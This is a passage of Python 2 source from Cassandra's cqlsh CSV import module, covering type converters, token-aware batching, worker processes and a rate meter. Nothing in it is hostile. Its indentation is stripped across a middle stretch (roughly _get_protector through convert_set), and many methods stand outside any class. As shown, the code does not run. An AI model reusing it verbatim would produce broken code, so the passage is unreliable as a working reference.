        self.thousands_sep = parent.thousands_sep
        self.boolean_styles = parent.boolean_styles
        self.date_time_format = parent.date_time_format.timestamp_format
        self.debug = parent.debug
        self.encoding = parent.encoding
        self.table_meta = table_meta
        # Positions of key columns within a csv record, used for routing.
        self.primary_key_indexes = [self.columns.index(col.name) for col in self.table_meta.primary_key]
        self.partition_key_indexes = [self.columns.index(col.name) for col in self.table_meta.partition_key]
        if statement is None:
            self.use_prepared_statements = False
            statement = self._get_primary_key_statement(parent, table_meta)
        else:
            self.use_prepared_statements = True
        self.is_counter = parent.is_counter(table_meta)
        self.proto_version = statement.protocol_version
        # the cql types and converters for the prepared statement, either the full statement or only the primary keys
        self.cqltypes = [c.type for c in statement.column_metadata]
        self.converters = [self._get_converter(c.type) for c in statement.column_metadata]
        # the cql types for the entire statement, these are the same as the types above but
        # only when using prepared statements
        self.coltypes = [table_meta.columns[name].cql_type for name in parent.valid_columns]
        # these functions are used for non-prepared statements to protect values with quotes if required
        self.protectors = [self._get_protector(t) for t in self.coltypes]
@staticmethod
def _get_protector(t):
if t in ('ascii', 'text', 'timestamp', 'date', 'time', 'inet'):
return lambda v: protect_value(v)
else:
return lambda v: v
@staticmethod
def _get_primary_key_statement(parent, table_meta):
"""
We prepare a query statement to find out the types of the partition key columns so we can
route the update query to the correct replicas. As far as I understood this is the easiest
way to find out the types of the partition columns, we will never use this prepared statement
"""
where_clause = ' AND '.join(['%s = ?' % (protect_name(c.name)) for c in table_meta.partition_key])
select_query = 'SELECT * FROM %s.%s WHERE %s' % (protect_name(parent.ks),
protect_name(parent.table),
where_clause)
return parent.session.prepare(select_query)
@staticmethod
def unprotect(v):
if v is not None:
return CqlRuleSet.dequote_value(v)
def _get_converter(self, cql_type):
"""
Return a function that converts a string into a value the can be passed
into BoundStatement.bind() for the given cql type. See cassandra.cqltypes
for more details.
"""
unprotect = self.unprotect
def convert(t, v):
v = unprotect(v)
if v == self.nullval:
return self.get_null_val()
return converters.get(t.typename, convert_unknown)(v, ct=t)
def convert_mandatory(t, v):
v = unprotect(v)
if v == self.nullval:
raise ParseError('Empty values are not allowed')
return converters.get(t.typename, convert_unknown)(v, ct=t)
def convert_blob(v, **_):
return bytearray.fromhex(v[2:])
def convert_text(v, **_):
return v
def convert_uuid(v, **_):
return UUID(v)
def convert_bool(v, **_):
return True if v.lower() == self.boolean_styles[0].lower() else False
def get_convert_integer_fcn(adapter=int):
"""
Return a slow and a fast integer conversion function depending on self.thousands_sep
"""
if self.thousands_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, ''))
else:
return lambda v, ct=cql_type: adapter(v)
def get_convert_decimal_fcn(adapter=float):
"""
Return a slow and a fast decimal conversion function depending on self.thousands_sep and self.decimal_sep
"""
if self.thousands_sep and self.decimal_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, '').replace(self.decimal_sep, '.'))
elif self.thousands_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, ''))
elif self.decimal_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.decimal_sep, '.'))
else:
return lambda v, ct=cql_type: adapter(v)
def split(val, sep=','):
"""
Split "val" into a list of values whenever the separator "sep" is found, but
ignore separators inside parentheses or single quotes, except for the two
outermost parentheses, which will be ignored. This method is called when parsing composite
types, "val" should be at least 2 characters long, the first char should be an
open parenthesis and the last char should be a matching closing parenthesis. We could also
check exactly which parenthesis type depending on the caller, but I don't want to enforce
too many checks that don't necessarily provide any additional benefits, and risk breaking
data that could previously be imported, even if strictly speaking it is incorrect CQL.
For example, right now we accept sets that start with '[' and ']', I don't want to break this
by enforcing '{' and '}' in a minor release.
"""
def is_open_paren(cc):
return cc == '{' or cc == '[' or cc == '('
def is_close_paren(cc):
return cc == '}' or cc == ']' or cc == ')'
def paren_match(c1, c2):
return (c1 == '{' and c2 == '}') or (c1 == '[' and c2 == ']') or (c1 == '(' and c2 == ')')
if len(val) < 2 or not paren_match(val[0], val[-1]):
raise ParseError('Invalid composite string, it should start and end with matching parentheses: {}'
.format(val))
ret = []
last = 1
level = 0
quote = False
for i, c in enumerate(val):
if c == '\'':
quote = not quote
elif not quote:
if is_open_paren(c):
level += 1
elif is_close_paren(c):
level -= 1
elif c == sep and level == 1:
ret.append(val[last:i])
last = i + 1
else:
if last < len(val) - 1:
ret.append(val[last:-1])
return ret
# this should match all possible CQL and CQLSH datetime formats
p = re.compile("(\d{4})\-(\d{2})\-(\d{2})\s?(?:'T')?" + # YYYY-MM-DD[( |'T')]
"(?:(\d{2}):(\d{2})(?::(\d{2})(?:\.(\d{1,6}))?))?" + # [HH:MM[:SS[.NNNNNN]]]
"(?:([+\-])(\d{2}):?(\d{2}))?") # [(+|-)HH[:]MM]]
def convert_datetime(val, **_):
try:
tval = time.strptime(val, self.date_time_format)
return timegm(tval) * 1e3 # scale seconds to millis for the raw value
except ValueError:
pass # if it's not in the default format we try CQL formats
m = p.match(val)
if not m:
try:
# in case of overflow COPY TO prints dates as milliseconds from the epoch, see
# deserialize_date_fallback_int in cqlsh.py
return int(val)
except ValueError:
raise ValueError("can't interpret %r as a date with format %s or as int" % (val,
self.date_time_format))
# https://docs.python.org/2/library/time.html#time.struct_time
tval = time.struct_time((int(m.group(1)), int(m.group(2)), int(m.group(3)), # year, month, day
int(m.group(4)) if m.group(4) else 0, # hour
int(m.group(5)) if m.group(5) else 0, # minute
int(m.group(6)) if m.group(6) else 0, # second
0, 1, -1)) # day of week, day of year, dst-flag
# convert sub-seconds (a number between 1 and 6 digits) to milliseconds
milliseconds = 0 if not m.group(7) else int(m.group(7)) * pow(10, 3 - len(m.group(7)))
if m.group(8):
offset = (int(m.group(9)) * 3600 + int(m.group(10)) * 60) * int(m.group(8) + '1')
else:
offset = -time.timezone
# scale seconds to millis for the raw value
return ((timegm(tval) + offset) * 1e3) + milliseconds
def convert_date(v, **_):
return Date(v)
def convert_time(v, **_):
return Time(v)
def convert_tuple(val, ct=cql_type):
return tuple(convert_mandatory(t, v) for t, v in zip(ct.subtypes, split(val)))
def convert_list(val, ct=cql_type):
return tuple(convert_mandatory(ct.subtypes[0], v) for v in split(val))
def convert_set(val, ct=cql_type):
return frozenset(convert_mandatory(ct.subtypes[0], v) for v in split(val))
def convert_map(val, ct=cql_type):
    """
    We need to pass to BoundStatement.bind() a dict() because it calls iteritems(),
    except we can't create a dict with another dict as the key, hence we use a class
    that adds iteritems to a frozen set of tuples (which is how dict are normally made
    immutable in python).
    """
    # frozenset subclass that quacks like a dict for bind(): iteritems()
    # simply yields the stored (key, value) tuples
    class ImmutableDict(frozenset):
        iteritems = frozenset.__iter__

    # split '{k1:v1, k2:v2}' into key/value pairs; keys are mandatory, values may be null
    return ImmutableDict(frozenset((convert_mandatory(ct.subtypes[0], v[0]), convert(ct.subtypes[1], v[1]))
                                   for v in [split('{%s}' % vv, sep=':') for vv in split(val)]))
def convert_user_type(val, ct=cql_type):
    """
    A user type is a dictionary except that we must convert each key into
    an attribute, so we are using named tuples. It must also be hashable,
    so we cannot use dictionaries. Maybe there is a way to instantiate ct
    directly but I could not work it out.
    Also note that it is possible that the subfield names in the csv are in the
    wrong order, so we must sort them according to ct.fieldnames, see CASSANDRA-12959.
    """
    # split '{f1:v1, f2:v2}' into [[f1, v1], [f2, v2]]
    vals = [v for v in [split('{%s}' % vv, sep=':') for vv in split(val)]]
    dict_vals = dict((unprotect(v[0]), v[1]) for v in vals)
    # order by ct.fieldnames; fields missing from the csv get the null value
    sorted_converted_vals = [(n, convert(t, dict_vals[n]) if n in dict_vals else self.get_null_val())
                             for n, t in zip(ct.fieldnames, ct.subtypes)]
    ret_type = namedtuple(ct.typename, [v[0] for v in sorted_converted_vals])
    return ret_type(*tuple(v[1] for v in sorted_converted_vals))
def convert_single_subtype(val, ct=cql_type):
    # unwrap single-subtype wrappers (e.g. frozen<T>, reversed<T>) and convert as T
    return converters.get(ct.subtypes[0].typename, convert_unknown)(val, ct=ct.subtypes[0])

def convert_unknown(val, ct=cql_type):
    # fallback for typenames with no registered converter
    if issubclass(ct, UserType):
        return convert_user_type(val, ct=ct)
    elif issubclass(ct, ReversedType):
        return convert_single_subtype(val, ct=ct)
    # give up and pass the raw string through unchanged
    printdebugmsg("Unknown type %s (%s) for val %s" % (ct, ct.typename, val))
    return val
# registry mapping CQL typenames to their converter; the dispatch below
# falls back to convert_unknown for anything not listed here
converters = {
    'blob': convert_blob,
    'decimal': get_convert_decimal_fcn(adapter=Decimal),  # exact decimal
    'uuid': convert_uuid,
    'boolean': convert_bool,
    'tinyint': get_convert_integer_fcn(),
    'ascii': convert_text,
    'float': get_convert_decimal_fcn(),
    'double': get_convert_decimal_fcn(),
    'bigint': get_convert_integer_fcn(adapter=long),
    'int': get_convert_integer_fcn(),
    'varint': get_convert_integer_fcn(),
    'inet': convert_text,  # addresses travel as text
    'counter': get_convert_integer_fcn(adapter=long),
    'timestamp': convert_datetime,
    'timeuuid': convert_uuid,
    'date': convert_date,
    'smallint': get_convert_integer_fcn(),
    'time': convert_time,
    'text': convert_text,
    'varchar': convert_text,
    'list': convert_list,
    'set': convert_set,
    'map': convert_map,
    'tuple': convert_tuple,
    'frozen': convert_single_subtype,
}

return converters.get(cql_type.typename, convert_unknown)
def get_null_val(self):
    """
    Return the null value that is inserted for fields that are missing from csv files.
    For counters we should return zero so that the counter value won't be incremented.
    For everything else we return nulls, this means None if we use prepared statements
    or "NULL" otherwise. Note that for counters we never use prepared statements, so we
    only check is_counter when use_prepared_statements is false.
    """
    if self.use_prepared_statements:
        return None
    return "0" if self.is_counter else "NULL"
def convert_row(self, row):
    """
    Convert the row into a list of parsed values if using prepared statements, else simply apply the
    protection functions to escape values with quotes when required. Also check on the row length and
    make sure primary partition key values aren't missing.

    Raises ParseError on a length mismatch, a null primary key, or a value
    that a converter rejects.
    """
    converters = self.converters if self.use_prepared_statements else self.protectors
    if len(row) != len(converters):
        raise ParseError('Invalid row length %d should be %d' % (len(row), len(converters)))

    for i in self.primary_key_indexes:
        if row[i] == self.nullval:
            raise ParseError(self.get_null_primary_key_message(i))

    def convert(c, v):
        try:
            return c(v) if v != self.nullval else self.get_null_val()
        except Exception as e:  # `as` form: valid on Python 2.6+ and Python 3
            # if we could not convert an empty string, then self.nullval has been set to a marker
            # because the user needs to import empty strings, except that the converters for some types
            # will fail to convert an empty string, in this case the null value should be inserted
            # see CASSANDRA-12794
            if v == '':
                return self.get_null_val()

            if self.debug:
                traceback.print_exc()
            # report the offending value via the local `v`; the previous code used
            # `val`, which only worked through the Python 2 comprehension-scope leak
            raise ParseError("Failed to parse %s : %s" % (v, e.message))

    return [convert(conv, val) for conv, val in zip(converters, row)]
def get_null_primary_key_message(self, idx):
    """Return the error text for a primary key column that holds the null marker."""
    parts = ["Cannot insert null value for primary key column '%s'." % (self.columns[idx],)]
    if self.nullval == '':
        # empty-string null markers get an extra hint about WITH NULL=<marker>
        parts.append(" If you want to insert empty strings, consider using"
                     " the WITH NULL=<marker> option for COPY.")
    return ''.join(parts)
def get_row_partition_key_values_fcn(self):
    """
    Return a function to convert a row into a string composed of the partition key values serialized
    and binary packed (the tokens on the ring). Depending on whether we are using prepared statements, we
    may have to convert the primary key values first, so we have two different serialize_value implementations.
    We also return different functions depending on how many partition key indexes we have (single or multiple).
    See also BoundStatement.routing_key.
    """
    def serialize_value_prepared(n, v):
        # prepared statements: values were already converted by convert_row()
        return self.cqltypes[n].serialize(v, self.proto_version)

    def serialize_value_not_prepared(n, v):
        # non-prepared: values are still raw csv strings, convert them first
        return self.cqltypes[n].serialize(self.converters[n](self.unprotect(v)), self.proto_version)

    partition_key_indexes = self.partition_key_indexes
    serialize = serialize_value_prepared if self.use_prepared_statements else serialize_value_not_prepared

    def serialize_row_single(row):
        return serialize(partition_key_indexes[0], row[partition_key_indexes[0]])

    def serialize_row_multiple(row):
        # composite partition key: each component is length-prefixed with a
        # big-endian unsigned short and terminated with a zero byte
        pk_values = []
        for i in partition_key_indexes:
            val = serialize(i, row[i])
            l = len(val)
            pk_values.append(struct.pack(">H%dsB" % l, l, val, 0))
        return b"".join(pk_values)

    if len(partition_key_indexes) == 1:
        return serialize_row_single
    return serialize_row_multiple
class TokenMap(object):
    """
    A wrapper around the metadata token map to speed things up by caching ring token *values* and
    replicas. It is very important that we use the token values, which are primitive types, rather
    than the tokens classes when calling bisect_right() in split_batches(). If we use primitive values,
    the bisect is done in compiled code whilst with token classes each comparison requires a call
    into the interpreter to perform the cmp operation defined in Python. A simple test with 1 million bisect
    operations on an array of 2048 tokens was done in 0.37 seconds with primitives and 2.25 seconds with
    token classes. This is significant for large datasets because we need to do a bisect for each single row,
    and if VNODES are used, the size of the token map can get quite large too.
    """

    def __init__(self, ks, hostname, local_dc, session):
        self.ks = ks  # keyspace name
        self.hostname = hostname  # contact host, used as the sole replica when no token map exists
        self.local_dc = local_dc  # only replicas in this datacenter are eligible
        self.metadata = session.cluster.metadata
        self._initialize_ring()
        # Note that refresh metadata is disabled by default and we currently do not intercept it
        # If hosts are added, removed or moved during a COPY operation our token map is no longer optimal
        # However we can cope with hosts going down and up since we filter for replicas that are up when
        # making each batch

    def _initialize_ring(self):
        """Cache ring token values, per-token replicas, and the pk -> token value function."""
        token_map = self.metadata.token_map
        if token_map is None:
            # no token metadata available: degenerate single-position ring that
            # maps every partition key to the contact host
            self.ring = [0]
            self.replicas = [(self.metadata.get_host(self.hostname),)]
            self.pk_to_token_value = lambda pk: 0
            return

        token_map.rebuild_keyspace(self.ks, build_if_absent=True)
        tokens_to_hosts = token_map.tokens_to_hosts_by_ks.get(self.ks, None)
        from_key = token_map.token_class.from_key
        # store primitive token values (not Token objects) so bisect_right runs in C
        self.ring = [token.value for token in token_map.ring]
        self.replicas = [tuple(tokens_to_hosts[token]) for token in token_map.ring]
        self.pk_to_token_value = lambda pk: from_key(pk).value

    @staticmethod
    def get_ring_pos(ring, val):
        # insertion point of val in the sorted ring; wrap around to 0 past the last token
        idx = bisect_right(ring, val)
        return idx if idx < len(ring) else 0

    def filter_replicas(self, hosts):
        # shuffle to spread load, then keep only local-DC replicas not known to be down
        shuffled = tuple(sorted(hosts, key=lambda k: random.random()))
        return filter(lambda r: r.is_up is not False and r.datacenter == self.local_dc, shuffled) if hosts else ()
class FastTokenAwarePolicy(DCAwareRoundRobinPolicy):
    """
    Send to any replicas attached to the query, or else fall back to DCAwareRoundRobinPolicy. Perform
    exponential back-off if too many in flight requests to all replicas are already in progress.
    """

    def __init__(self, parent):
        DCAwareRoundRobinPolicy.__init__(self, parent.local_dc, 0)
        self.max_backoff_attempts = parent.max_backoff_attempts
        self.max_inflight_messages = parent.max_inflight_messages

    def make_query_plan(self, working_keyspace=None, query=None):
        """
        Extend TokenAwarePolicy.make_query_plan() so that we choose the same replicas in preference
        and most importantly we avoid repeating the (slow) bisect. We also implement a backoff policy
        by sleeping an exponentially larger delay in case all connections to eligible replicas have
        too many in flight requests.
        """
        connections = ConnectionWrapper.connections
        # replicas attached to the statement come first, then the parent policy's plan
        replicas = list(query.replicas) if hasattr(query, 'replicas') else []
        replicas.extend([r for r in DCAwareRoundRobinPolicy.make_query_plan(self, working_keyspace, query)
                         if r not in replicas])

        if replicas:
            def replica_is_not_overloaded(r):
                if r.address in connections:
                    conn = connections[r.address]
                    return conn.in_flight < min(conn.max_request_id, self.max_inflight_messages)
                return True  # no connection yet: assume it is usable

            for i in xrange(self.max_backoff_attempts):
                for r in filter(replica_is_not_overloaded, replicas):
                    yield r

                # the back-off starts at 10 ms (0.01) and it can go up to 2^max_backoff_attempts,
                # which is currently 12, so 2^12 = 4096 = ~40 seconds when dividing by 0.01
                delay = randint(1, pow(2, i + 1)) * 0.01
                # use %.2f: the delay is a float and usually < 1 second, which the
                # previous %d format silently truncated to "0 second(s)"
                printdebugmsg("All replicas busy, sleeping for %.2f second(s)..." % (delay,))
                time.sleep(delay)

            printdebugmsg("Replicas too busy, given up")
class ConnectionWrapper(DefaultConnection):
    """
    A wrapper to the driver default connection that helps in keeping track of messages in flight.
    The newly created connection is registered into a global dictionary so that FastTokenAwarePolicy
    is able to determine if a connection has too many in flight requests.
    """
    # class-level registry: host -> most recently created connection for that host
    connections = {}

    def __init__(self, *args, **kwargs):
        DefaultConnection.__init__(self, *args, **kwargs)
        # register (or replace) this connection for its host
        self.connections[self.host] = self
class ImportProcess(ChildProcess):
    """A worker child process: converts csv chunks into statements and executes them."""

    def __init__(self, params):
        ChildProcess.__init__(self, params=params, target=self.run)

        # columns the user asked to skip, and the encoded names of imported columns
        self.skip_columns = params['skip_columns']
        self.valid_columns = [c.encode(self.encoding) for c in params['valid_columns']]
        self.skip_column_indexes = [i for i, c in enumerate(self.columns) if c in self.skip_columns]

        # COPY options forwarded from the parent process
        options = params['options']
        self.nullval = options.copy['nullval']
        self.max_attempts = options.copy['maxattempts']
        self.min_batch_size = options.copy['minbatchsize']
        self.max_batch_size = options.copy['maxbatchsize']
        self.use_prepared_statements = options.copy['preparedstatements']
        self.ttl = options.copy['ttl']
        self.max_inflight_messages = options.copy['maxinflightmessages']
        self.max_backoff_attempts = options.copy['maxbackoffattempts']
        self.request_timeout = options.copy['requesttimeout']
        self.dialect_options = options.dialect

        # initialized lazily (session) or by make_params()
        self._session = None
        self.query = None
        self.conv = None
        self.make_statement = None

    @property
    def session(self):
        # lazily create the cluster connection on first use
        if not self._session:
            cluster = Cluster(
                contact_points=(self.hostname,),
                port=self.port,
                cql_version=self.cql_version,
                protocol_version=self.protocol_version,
                auth_provider=self.auth_provider,
                load_balancing_policy=FastTokenAwarePolicy(self),
                ssl_options=ssl_settings(self.hostname, self.config_file) if self.ssl else None,
                default_retry_policy=FallthroughRetryPolicy(),  # we throw on timeouts and retry in the error callback
                compression=None,
                control_connection_timeout=self.connect_timeout,
                connect_timeout=self.connect_timeout,
                idle_heartbeat_interval=0,
                connection_class=ConnectionWrapper)

            self._session = cluster.connect(self.ks)
            self._session.default_timeout = self.request_timeout
        return self._session
def run(self):
    """Child process entry point: optionally profile, then consume chunks until closed."""
    try:
        pr = profile_on() if PROFILE_ON else None

        self.on_fork()
        self.inner_run(*self.make_params())

        if pr:
            profile_off(pr, file_name='worker_profile_%d.txt' % (os.getpid(),))

    except Exception, exc:
        self.report_error(exc)

    finally:
        self.close()

def close(self):
    # shut down the cluster connection before closing the parent channels
    if self._session:
        self._session.cluster.shutdown()
    ChildProcess.close(self)

def is_counter(self, table_meta):
    # tables with counter columns must be written via UPDATE, not INSERT
    return "counter" in [table_meta.columns[name].cql_type for name in self.valid_columns]

def make_params(self):
    """Build the query (plain or prepared), converter, token map and statement factory."""
    metadata = self.session.cluster.metadata
    table_meta = metadata.keyspaces[self.ks].tables[self.table]

    prepared_statement = None
    if self.is_counter(table_meta):
        # counters: UPDATE with per-row SET/WHERE clauses substituted later
        query = 'UPDATE %s.%s SET %%s WHERE %%s' % (protect_name(self.ks), protect_name(self.table))
        make_statement = self.wrap_make_statement(self.make_counter_batch_statement)
    elif self.use_prepared_statements:
        query = 'INSERT INTO %s.%s (%s) VALUES (%s)' % (protect_name(self.ks),
                                                        protect_name(self.table),
                                                        ', '.join(protect_names(self.valid_columns),),
                                                        ', '.join(['?' for _ in self.valid_columns]))
        if self.ttl >= 0:
            query += 'USING TTL %s' % (self.ttl,)
        query = self.session.prepare(query)
        query.consistency_level = self.consistency_level
        prepared_statement = query
        make_statement = self.wrap_make_statement(self.make_prepared_batch_statement)
    else:
        # non-prepared: values are inlined in the query text per row
        query = 'INSERT INTO %s.%s (%s) VALUES (%%s)' % (protect_name(self.ks),
                                                         protect_name(self.table),
                                                         ', '.join(protect_names(self.valid_columns),))
        if self.ttl >= 0:
            query += 'USING TTL %s' % (self.ttl,)
        make_statement = self.wrap_make_statement(self.make_non_prepared_batch_statement)

    conv = ImportConversion(self, table_meta, prepared_statement)
    tm = TokenMap(self.ks, self.hostname, self.local_dc, self.session)
    return query, conv, tm, make_statement
def inner_run(self, query, conv, tm, make_statement):
    """
    Main run method. Note that we bind self methods that are called inside loops
    for performance reasons.
    """
    self.query = query
    self.conv = conv
    self.make_statement = make_statement

    convert_rows = self.convert_rows
    split_into_batches = self.split_into_batches
    result_callback = self.result_callback
    err_callback = self.err_callback
    session = self.session

    while True:
        chunk = self.inmsg.recv()
        if chunk is None:  # sentinel from the parent: no more work
            break

        try:
            chunk['rows'] = convert_rows(conv, chunk)
            for replicas, batch in split_into_batches(chunk, conv, tm):
                statement = make_statement(query, conv, chunk, batch, replicas)
                if statement:
                    future = session.execute_async(statement)
                    future.add_callbacks(callback=result_callback, callback_args=(batch, chunk),
                                         errback=err_callback, errback_args=(batch, chunk, replicas))
                # do not handle else case, if a statement could not be created, the exception is handled
                # in self.wrap_make_statement and the error is reported, if a failure is injected that
                # causes the statement to be None, then we should not report the error so that we can test
                # the parent process handling missing batches from child processes
        except Exception, exc:
            self.report_error(exc, chunk, chunk['rows'])

def wrap_make_statement(self, inner_make_statement):
    """Wrap a statement factory with error reporting and optional test-failure injection."""
    def make_statement(query, conv, chunk, batch, replicas):
        try:
            return inner_make_statement(query, conv, batch, replicas)
        except Exception, exc:
            print "Failed to make batch statement: {}".format(exc)
            self.report_error(exc, chunk, batch['rows'])
            return None

    def make_statement_with_failures(query, conv, chunk, batch, replicas):
        # test hook: possibly substitute a failing statement or suppress the batch
        failed_batch, apply_failure = self.maybe_inject_failures(batch)
        if apply_failure:
            return failed_batch
        return make_statement(query, conv, chunk, batch, replicas)

    return make_statement_with_failures if self.test_failures else make_statement
def make_counter_batch_statement(self, query, conv, batch, replicas):
    """Build a COUNTER batch: one UPDATE per row with SET/WHERE clauses filled in."""
    statement = BatchStatement(batch_type=BatchType.COUNTER, consistency_level=self.consistency_level)
    statement.replicas = replicas
    statement.keyspace = self.ks
    for row in batch['rows']:
        where_clause = []
        set_clause = []
        for i, value in enumerate(row):
            if i in conv.primary_key_indexes:
                where_clause.append("%s=%s" % (self.valid_columns[i], value))
            else:
                # counters can only be incremented: col = col + value
                set_clause.append("%s=%s+%s" % (self.valid_columns[i], self.valid_columns[i], value))

        full_query_text = query % (','.join(set_clause), ' AND '.join(where_clause))
        statement.add(full_query_text)
    return statement

def make_prepared_batch_statement(self, query, _, batch, replicas):
    """
    Return a batch statement. This is an optimized version of:

        statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
        for row in batch['rows']:
            statement.add(query, row)

    We could optimize further by removing bound_statements altogether but we'd have to duplicate much
    more driver's code (BoundStatement.bind()).
    """
    statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
    statement.replicas = replicas
    statement.keyspace = self.ks
    # (True, ...) marks each entry as a prepared query id plus bound values
    statement._statements_and_parameters = [(True, query.query_id, query.bind(r).values) for r in batch['rows']]
    return statement

def make_non_prepared_batch_statement(self, query, _, batch, replicas):
    """Build an UNLOGGED batch of plain INSERTs with values inlined in the query text."""
    statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
    statement.replicas = replicas
    statement.keyspace = self.ks
    statement._statements_and_parameters = [(False, query % (','.join(r),), ()) for r in batch['rows']]
    return statement
def convert_rows(self, conv, chunk):
    """
    Return converted rows and report any errors during conversion.
    """
    def filter_row_values(row):
        # drop the values of columns the user asked to skip
        return [v for i, v in enumerate(row) if i not in self.skip_column_indexes]

    if self.skip_column_indexes:
        rows = [filter_row_values(r) for r in list(csv.reader(chunk['rows'], **self.dialect_options))]
    else:
        rows = list(csv.reader(chunk['rows'], **self.dialect_options))

    errors = defaultdict(list)

    def convert_row(r):
        try:
            return conv.convert_row(r)
        except Exception, err:
            # group failing rows by error message so each message is reported once
            errors[err.message].append(r)
            return None

    converted_rows = filter(None, [convert_row(r) for r in rows])

    if errors:
        for msg, rows in errors.iteritems():
            self.report_error(ParseError(msg), chunk, rows)
    return converted_rows
def maybe_inject_failures(self, batch):
    """
    Examine self.test_failures and see if the batch is a batch
    supposed to cause a failure (failing_batch), or to terminate the worker process
    (exit_batch), or not to be sent (unsent_batch).

    @return any statement that will cause a failure or None if the statement should not be sent
    plus a boolean indicating if a failure should be applied at all
    """
    if 'failing_batch' in self.test_failures:
        failing_batch = self.test_failures['failing_batch']
        if failing_batch['id'] == batch['id']:
            if batch['attempts'] < failing_batch['failures']:
                statement = SimpleStatement("INSERT INTO badtable (a, b) VALUES (1, 2)",
                                            consistency_level=self.consistency_level)
                return statement, True  # use this statement, which will cause an error

    if 'exit_batch' in self.test_failures:
        exit_batch = self.test_failures['exit_batch']
        if exit_batch['id'] == batch['id']:
            sys.exit(1)  # simulate an abrupt worker death

    if 'unsent_batch' in self.test_failures:
        unsent_batch = self.test_failures['unsent_batch']
        if unsent_batch['id'] == batch['id']:
            return None, True  # do not send this batch, which will cause missing acks in the parent process

    return None, False  # carry on as normal, do not apply any failures

@staticmethod
def make_batch(batch_id, rows, attempts=1):
    # the minimal batch envelope shared between parent and child processes
    return {'id': batch_id, 'rows': rows, 'attempts': attempts}
def split_into_batches(self, chunk, conv, tm):
    """
    Batch rows by ring position or replica.
    If there are at least min_batch_size rows for a ring position then split these rows into
    groups of max_batch_size and send a batch for each group, using all replicas for this ring position.
    Otherwise, we are forced to batch by replica, and here unfortunately we can only choose one replica to
    guarantee common replicas across partition keys. We are typically able
    to batch by ring position for small clusters or when VNODES are not used. For large clusters with VNODES
    it may not be possible, in this case it helps to increase the CHUNK SIZE but up to a limit, otherwise
    we may choke the cluster.
    """
    rows_by_ring_pos = defaultdict(list)
    errors = defaultdict(list)

    min_batch_size = self.min_batch_size
    max_batch_size = self.max_batch_size
    ring = tm.ring

    # bind invariants to locals: this loop does one bisect per row and is hot
    get_row_partition_key_values = conv.get_row_partition_key_values_fcn()
    pk_to_token_value = tm.pk_to_token_value
    get_ring_pos = tm.get_ring_pos
    make_batch = self.make_batch

    for row in chunk['rows']:
        try:
            pk = get_row_partition_key_values(row)
            rows_by_ring_pos[get_ring_pos(ring, pk_to_token_value(pk))].append(row)
        except Exception, e:
            errors[e.message].append(row)

    if errors:
        for msg, rows in errors.iteritems():
            self.report_error(ParseError(msg), chunk, rows)

    replicas = tm.replicas
    filter_replicas = tm.filter_replicas
    rows_by_replica = defaultdict(list)
    for ring_pos, rows in rows_by_ring_pos.iteritems():
        if len(rows) > min_batch_size:
            # enough rows for this ring position: batch by position
            for i in xrange(0, len(rows), max_batch_size):
                yield filter_replicas(replicas[ring_pos]), make_batch(chunk['id'], rows[i:i + max_batch_size])
        else:
            # select only the first valid replica to guarantee more overlap or none at all
            rows_by_replica[filter_replicas(replicas[ring_pos])[:1]].extend(rows)

    # Now send the batches by replica
    for replicas, rows in rows_by_replica.iteritems():
        for i in xrange(0, len(rows), max_batch_size):
            yield replicas, make_batch(chunk['id'], rows[i:i + max_batch_size])
def result_callback(self, _, batch, chunk):
    # success: count this batch's rows towards the chunk's completion
    self.update_chunk(batch['rows'], chunk)

def err_callback(self, response, batch, chunk, replicas):
    """Report a failed batch and retry it on the same replicas unless out of attempts."""
    if isinstance(response, OperationTimedOut) and chunk['imported'] == chunk['num_rows_sent']:
        return  # occasionally the driver sends false timeouts for rows already processed (PYTHON-652)
    err_is_final = batch['attempts'] >= self.max_attempts
    self.report_error(response, chunk, batch['rows'], batch['attempts'], err_is_final)
    if not err_is_final:
        batch['attempts'] += 1
        statement = self.make_statement(self.query, self.conv, chunk, batch, replicas)
        future = self.session.execute_async(statement)
        future.add_callbacks(callback=self.result_callback, callback_args=(batch, chunk),
                             errback=self.err_callback, errback_args=(batch, chunk, replicas))

def report_error(self, err, chunk=None, rows=None, attempts=1, final=True):
    """Send an ImportTaskError to the parent; final errors also mark the rows as done."""
    if self.debug and sys.exc_info()[1] == err:
        traceback.print_exc()
    self.outmsg.send(ImportTaskError(err.__class__.__name__, err.message, rows, attempts, final))
    if final and chunk is not None:
        self.update_chunk(rows, chunk)

def update_chunk(self, rows, chunk):
    # once every row of the chunk is accounted for, ack the chunk to the parent
    chunk['imported'] += len(rows)
    if chunk['imported'] == chunk['num_rows_sent']:
        self.outmsg.send(ImportProcessResult(chunk['num_rows_sent']))
class RateMeter(object):
    """Measures the processing rate (rows/s) and periodically logs progress."""

    def __init__(self, log_fcn, update_interval=0.25, log_file=''):
        self.log_fcn = log_fcn  # the function for logging, may be None to disable logging
        self.update_interval = update_interval  # how often we update in seconds
        self.log_file = log_file  # an optional file where to log statistics in addition to stdout
        self.start_time = time.time()  # the start time
        self.last_checkpoint_time = self.start_time  # last time we logged
        self.current_rate = 0.0  # rows per second
        self.current_record = 0  # number of records since we last updated
        self.total_records = 0  # total number of records

        # start each run with a fresh statistics file
        if os.path.isfile(self.log_file):
            os.unlink(self.log_file)

    def increment(self, n=1):
        self.current_record += n
        self.maybe_update()

    def maybe_update(self, sleep=False):
        """Refresh the rate/log if an interval elapsed; optionally sleep out the rest of it."""
        if self.current_record == 0:
            return
        new_checkpoint_time = time.time()
        time_difference = new_checkpoint_time - self.last_checkpoint_time
        if time_difference >= self.update_interval:
            self.update(new_checkpoint_time)
            self.log_message()
        elif sleep:
            # Fixed: this used to compute time_difference - update_interval, which is
            # always negative in this branch, so the sleep could never trigger.
            remaining_time = self.update_interval - time_difference
            if remaining_time > 0.000001:
                time.sleep(remaining_time)

    def update(self, new_checkpoint_time):
        """Fold pending records into the totals and recompute the smoothed rate."""
        time_difference = new_checkpoint_time - self.last_checkpoint_time
        if time_difference >= 1e-09:
            self.current_rate = self.get_new_rate(self.current_record / time_difference)
        self.last_checkpoint_time = new_checkpoint_time
        self.total_records += self.current_record
        self.current_record = 0

    def get_new_rate(self, new_rate):
        """
        return the rate of the last period: this is the new rate but
        averaged with the last rate to smooth a bit
